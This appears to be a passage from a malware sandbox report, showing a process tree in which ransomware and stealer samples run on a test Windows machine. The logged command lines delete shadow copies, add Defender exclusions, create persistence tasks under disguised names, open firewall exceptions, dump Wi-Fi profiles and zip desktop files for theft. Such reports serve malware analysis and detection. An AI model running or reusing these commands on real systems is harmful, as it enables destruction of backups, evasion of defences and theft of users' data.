      taskdl.exe
      4⤵
      PID:7332
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
      taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      4⤵
      PID:7032
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      @[email protected]
      4⤵
      PID:7300
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
      taskdl.exe
      4⤵
      PID:4956
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
      taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      4⤵
      PID:4928
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      @[email protected]
      4⤵
      PID:5460
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
      taskdl.exe
      4⤵
      PID:4576
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
      taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      4⤵
      PID:6696
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      @[email protected]
      4⤵
      PID:5232
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
      taskdl.exe
      4⤵
      PID:1712
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
      taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      4⤵
      PID:7424
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      @[email protected]
      4⤵
      PID:3768
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
      taskdl.exe
      4⤵
      PID:6012
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
      taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      4⤵
      PID:6632
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      @[email protected]
      4⤵
      PID:6848
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
      taskdl.exe
      4⤵
      PID:8168
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
      taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      4⤵
      PID:856
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      @[email protected]
      4⤵
      PID:1956
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
      taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      4⤵
      PID:6372
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      @[email protected]
      4⤵
      PID:3148
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
      taskdl.exe
      4⤵
      PID:2896
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
      taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      4⤵
      PID:6756
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      @[email protected]
      4⤵
      PID:5468
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
      taskdl.exe
      4⤵
      PID:876
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
      taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      4⤵
      PID:5548
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      @[email protected]
      4⤵
      PID:7836
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
      taskdl.exe
      4⤵
      PID:4996
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
      taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      4⤵
      PID:3140
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      @[email protected]
      4⤵
      PID:7552
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
      taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      4⤵
      PID:6884
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      @[email protected]
      4⤵
      PID:5976
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
      taskdl.exe
      4⤵
      PID:3060
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
      taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      4⤵
      PID:4208
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      @[email protected]
      4⤵
      PID:2720
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
      taskdl.exe
      4⤵
      PID:4392
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
      taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      4⤵
      PID:5232
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      @[email protected]
      4⤵
      PID:7756
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
      taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      4⤵
      PID:6996
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      @[email protected]
      4⤵
      PID:2224
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
      taskdl.exe
      4⤵
      PID:7776
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
      taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      4⤵
      PID:4000
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      @[email protected]
      4⤵
      PID:3408
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
      taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      4⤵
      PID:6124
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      @[email protected]
      4⤵
      PID:7452
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
      taskdl.exe
      4⤵
      PID:8096
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
      taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      4⤵
      PID:4996
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      @[email protected]
      4⤵
      PID:3836
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
      taskdl.exe
      4⤵
      PID:2292
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
      taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      4⤵
      PID:1744
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      @[email protected]
      4⤵
      PID:4660
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
      taskdl.exe
      4⤵
      PID:5960
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
      taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      4⤵
      PID:6796
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      @[email protected]
      4⤵
      PID:3144
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
      taskdl.exe
      4⤵
      PID:3076
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
      taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      4⤵
      PID:7040
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      @[email protected]
      4⤵
      PID:8060
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
      taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      4⤵
      PID:4168
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      @[email protected]
      4⤵
      PID:3684
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
      taskdl.exe
      4⤵
      PID:8096
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
      taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      4⤵
      PID:6988
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      @[email protected]
      4⤵
      PID:5416
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
      taskdl.exe
      4⤵
      PID:1852
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
      taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      4⤵
      PID:7264
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      @[email protected]
      4⤵
      PID:6468
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
      taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      4⤵
      PID:1944
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      @[email protected]
      4⤵
      PID:2140
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
      taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      4⤵
      PID:3684
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      @[email protected]
      4⤵
      PID:6932
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\RIP_YOUR_PC_LOL.exe
    "RIP_YOUR_PC_LOL.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:1704
  - - C:\Users\Admin\Desktop\1.exe
      "C:\Users\Admin\Desktop\1.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:4440
    - - C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\55DB.tmp\55EC.tmp\55ED.bat C:\Users\Admin\Desktop\1.exe"
        5⤵
        
        PID:2004
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/2bB2s6
        6⤵
        
        PID:4076
  - - C:\Users\Admin\Desktop\10.exe
      "C:\Users\Admin\Desktop\10.exe"
      4⤵
      PID:4260
    - - C:\Windows\SysWOW64\attrib.exe
        
        attrib +h .
        5⤵
        Views/modifies file attributes
        
        PID:4996
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls . /grant Everyone:F /T /C /Q
        5⤵
        Modifies file permissions
        
        PID:1656
  - - C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
      "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\Desktop\2.doc" /o ""
      4⤵
      PID:5372
  - - C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
      "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\Desktop\3.xlsx"
      4⤵
      PID:5604
  - - C:\Users\Admin\Desktop\5.exe
      "C:\Users\Admin\Desktop\5.exe"
      4⤵
      PID:5740
    - - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\PROGRA~3\system.exe"
        5⤵
        
        PID:4952
      - C:\PROGRA~3\system.exe
        
        C:\PROGRA~3\system.exe
        6⤵
        
        PID:4532
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\ProgramData\system.exe" "system.exe" ENABLE
        7⤵
        Modifies Windows Firewall
        
        PID:4908
  - - C:\Users\Admin\Desktop\6.exe
      "C:\Users\Admin\Desktop\6.exe"
      4⤵
      PID:5772
    - - C:\Windows\System32\imapi2fs\lsass.exe
        
        "C:\Windows\System32\imapi2fs\lsass.exe"
        5⤵
        
        PID:272
  - - C:\Users\Admin\Desktop\7.exe
      "C:\Users\Admin\Desktop\7.exe"
      4⤵
      PID:5836
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\Admin\AppData\Local\Temp\holdermail.txt"
        5⤵
        
        PID:984
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\Admin\AppData\Local\Temp\holderwb.txt"
        5⤵
        
        PID:6500
  - - C:\Users\Admin\Desktop\8.exe
      "C:\Users\Admin\Desktop\8.exe"
      4⤵
      PID:5888
    - - C:\Windows\system32\wbem\wmic.exe
        
        "C:\makhe\hbf\..\..\Windows\gwm\..\system32\n\t\..\..\wbem\ywhal\dn\df\..\..\..\wmic.exe" shadowcopy delete
        5⤵
        
        PID:6936
  - - C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
      "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\Desktop\9.docm" /o ""
      4⤵
      PID:6048
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\ska2pwej.aeh.exe
    "ska2pwej.aeh.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:3444
  - - C:\Users\Admin\AppData\Local\Temp\is-PSKG4.tmp\ska2pwej.aeh.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-PSKG4.tmp\ska2pwej.aeh.tmp" /SL5="$2023A,4511977,830464,C:\Users\Admin\AppData\Local\Temp\RarSFX0\ska2pwej.aeh.exe"
      4⤵
      Executes dropped EXE
      PID:740
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\x2s443bc.cs1.exe
    "x2s443bc.cs1.exe"
    3⤵
    PID:2796
  - - C:\Users\Admin\AppData\Local\Temp\is-V5BRA.tmp\x2s443bc.cs1.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-V5BRA.tmp\x2s443bc.cs1.tmp" /SL5="$2023E,15784509,779776,C:\Users\Admin\AppData\Local\Temp\RarSFX0\x2s443bc.cs1.exe"
      4⤵
      PID:4008

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --mojo-platform-channel-handle=4044 --field-trial-handle=3240,i,13319578961094268484,16557498665191861597,262144 --variations-seed-version /prefetch:1
1⤵
PID:5108

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --mojo-platform-channel-handle=3824 --field-trial-handle=3240,i,13319578961094268484,16557498665191861597,262144 --variations-seed-version /prefetch:1
1⤵
PID:1600

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4772 --field-trial-handle=3240,i,13319578961094268484,16557498665191861597,262144 --variations-seed-version /prefetch:8
1⤵
PID:3132

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=4448 --field-trial-handle=3240,i,13319578961094268484,16557498665191861597,262144 --variations-seed-version /prefetch:8
1⤵
PID:3608

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\PerfLogs\dllhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5364

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:5320

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Endermanch@WannaCrypt0r" /sc ONLOGON /tr "'C:\Program Files\dotnet\host\fxr\6.0.25\[email protected]'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5780

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Windows\System32\imapi2fs\lsass.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5792

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "msedge" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft\Edge\Application\delegatedWebFeatures\msedge.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:6076

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\winlogon.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3904

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "msedge" /sc ONLOGON /tr "'C:\odt\msedge.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3036

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Endermanch@NoMoreRansom" /sc ONLOGON /tr "'C:\Users\Admin\AppData\Local\Temp\RarSFX0\@Please_Read_Me@\[email protected]'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5240

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 4988 -ip 4988
1⤵
PID:6860

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 5188 -ip 5188
1⤵
PID:7108

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=21 --mojo-platform-channel-handle=1612 --field-trial-handle=3240,i,13319578961094268484,16557498665191861597,262144 --variations-seed-version /prefetch:1
1⤵
PID:6708

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-US --service-sandbox-type=search_indexer --message-loop-type-ui --no-appcompat-clear --mojo-platform-channel-handle=5292 --field-trial-handle=3240,i,13319578961094268484,16557498665191861597,262144 --variations-seed-version /prefetch:8
1⤵
PID:6552

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=6140 --field-trial-handle=3240,i,13319578961094268484,16557498665191861597,262144 --variations-seed-version /prefetch:8
1⤵
PID:800

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 6888 -ip 6888
1⤵
PID:2808

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4496 -ip 4496
1⤵
PID:4500

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x4b0 0x2f4
1⤵
PID:5604

C:\Users\Admin\AppData\Local\Temp\00c07260dc\explorgu.exe
C:\Users\Admin\AppData\Local\Temp\00c07260dc\explorgu.exe
1⤵
PID:7496
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\100098~1\ALEXXX~1.EXE"
  2⤵
  PID:7968
- - C:\Users\Admin\AppData\Local\Temp\100098~1\ALEXXX~1.EXE
    C:\Users\Admin\AppData\Local\Temp\100098~1\ALEXXX~1.EXE
    3⤵
    PID:3024
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      PID:380
    - - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Roaming\CONFIG~1\Traffic.exe"
        5⤵
        
        PID:456
      - C:\Users\Admin\AppData\Roaming\CONFIG~1\Traffic.exe
        
        C:\Users\Admin\AppData\Roaming\CONFIG~1\Traffic.exe
        6⤵
        
        PID:3168
    - - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Roaming\CONFIG~1\propro.exe"
        5⤵
        
        PID:276
      - C:\Users\Admin\AppData\Roaming\CONFIG~1\propro.exe
        
        C:\Users\Admin\AppData\Roaming\CONFIG~1\propro.exe
        6⤵
        
        PID:5564
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\100104~1\32456.exe"
  2⤵
  PID:1596
- - C:\Users\Admin\AppData\Local\Temp\100104~1\32456.exe
    C:\Users\Admin\AppData\Local\Temp\100104~1\32456.exe
    3⤵
    PID:2008
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\100105~1\GOLDPR~1.EXE"
  2⤵
  PID:6476
- - C:\Users\Admin\AppData\Local\Temp\100105~1\GOLDPR~1.EXE
    C:\Users\Admin\AppData\Local\Temp\100105~1\GOLDPR~1.EXE
    3⤵
    PID:7028
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      PID:4388
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      PID:4896
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll, Main
  2⤵
  PID:4212
- - C:\Windows\SysWOW64\rundll32.exe
    C:\Windows\System32\rundll32.exe C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll, Main
    3⤵
    PID:5404
  - - C:\Windows\system32\rundll32.exe
      C:\Windows\System32\rundll32.exe C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll, Main
      4⤵
      PID:5784
    - - C:\Windows\system32\netsh.exe
        
        netsh wlan show profiles
        5⤵
        
        PID:4700
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\808065738166_Desktop.zip' -CompressionLevel Optimal
        5⤵
        
        PID:2368
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\100105~2\NewB.exe"
  2⤵
  PID:5376
- - C:\Users\Admin\AppData\Local\Temp\100105~2\NewB.exe
    C:\Users\Admin\AppData\Local\Temp\100105~2\NewB.exe
    3⤵
    PID:6772
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN NewB.exe /TR "C:\Users\Admin\AppData\Local\Temp\100105~2\NewB.exe" /F
      4⤵
      PID:272
    - - C:\Windows\SysWOW64\schtasks.exe
        
        C:\Windows\System32\schtasks.exe /Create /SC MINUTE /MO 1 /TN NewB.exe /TR C:\Users\Admin\AppData\Local\Temp\100105~2\NewB.exe /F
        5⤵
        Creates scheduled task(s)
        
        PID:6608
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\100107~1\swiiiii.exe"
  2⤵
  PID:7632
- - C:\Users\Admin\AppData\Local\Temp\100107~1\swiiiii.exe
    C:\Users\Admin\AppData\Local\Temp\100107~1\swiiiii.exe
    3⤵
    PID:4208
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      PID:4740
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      PID:7536
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4208 -s 884
      4⤵
      Program crash
      PID:5868
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\100107~2\koooooo.exe"
  2⤵
  PID:6208
- - C:\Users\Admin\AppData\Local\Temp\100107~2\koooooo.exe
    C:\Users\Admin\AppData\Local\Temp\100107~2\koooooo.exe
    3⤵
    PID:2224
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      PID:1720
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2224 -s 856
      4⤵
      Program crash
      PID:5144
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main
  2⤵
  PID:5624
- - C:\Windows\SysWOW64\rundll32.exe
    C:\Windows\System32\rundll32.exe C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main
    3⤵
    PID:7344
- C:\Users\Admin\AppData\Local\Temp\00c07260dc\explorgu.exe
  "C:\Users\Admin\AppData\Local\Temp\00c07260dc\explorgu.exe"
  2⤵
  PID:2044
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\100108~1\random.exe"
  2⤵
  PID:3284
- - C:\Users\Admin\AppData\Local\Temp\100108~1\random.exe
    C:\Users\Admin\AppData\Local\Temp\100108~1\random.exe
    3⤵
    PID:5072
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\100108~2\FILE30~1.EXE"
  2⤵
  PID:4852
- - C:\Users\Admin\AppData\Local\Temp\100108~2\FILE30~1.EXE
    C:\Users\Admin\AppData\Local\Temp\100108~2\FILE30~1.EXE
    3⤵
    PID:5380
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\100108~2\FILE30~1.EXE" -Force
      4⤵
      PID:6940
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\100108~2\FILE30~1.EXE -Force
        5⤵
        
        PID:6104
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
      4⤵
      PID:5108
    - - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\Pictures\G2VTUP~1.EXE"
        5⤵
        
        PID:5856
      - C:\Users\Admin\Pictures\G2VTUP~1.EXE
        
        C:\Users\Admin\Pictures\G2VTUP~1.EXE
        6⤵
        
        PID:4596
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\U3JO0~1.EXE"
        7⤵
        
        PID:6264
        
        C:\Users\Admin\AppData\Local\Temp\U3JO0~1.EXE
        
        C:\Users\Admin\AppData\Local\Temp\U3JO0~1.EXE
        8⤵
        
        PID:2656
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2656 -s 1196
        9⤵
        Program crash
        
        PID:2456
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\U3JO1~1.EXE"
        7⤵
        
        PID:2600
        
        C:\Users\Admin\AppData\Local\Temp\U3JO1~1.EXE
        
        C:\Users\Admin\AppData\Local\Temp\U3JO1~1.EXE
        8⤵
        
        PID:7504
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4596 -s 1564
        7⤵
        Program crash
        
        PID:5340
    - - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\Pictures\GZUQWQ~1.EXE"
        5⤵
        
        PID:7752
      - C:\Users\Admin\Pictures\GZUQWQ~1.EXE
        
        C:\Users\Admin\Pictures\GZUQWQ~1.EXE
        6⤵
        
        PID:7868
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        7⤵
        
        PID:3304
    - - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\Pictures\SNHMZZ~1.EXE"
        5⤵
        
        PID:5392
      - C:\Users\Admin\Pictures\SNHMZZ~1.EXE
        
        C:\Users\Admin\Pictures\SNHMZZ~1.EXE
        6⤵
        
        PID:6872
        
        C:\Users\Admin\AppData\Local\Temp\7zS48D8.tmp\Install.exe
        
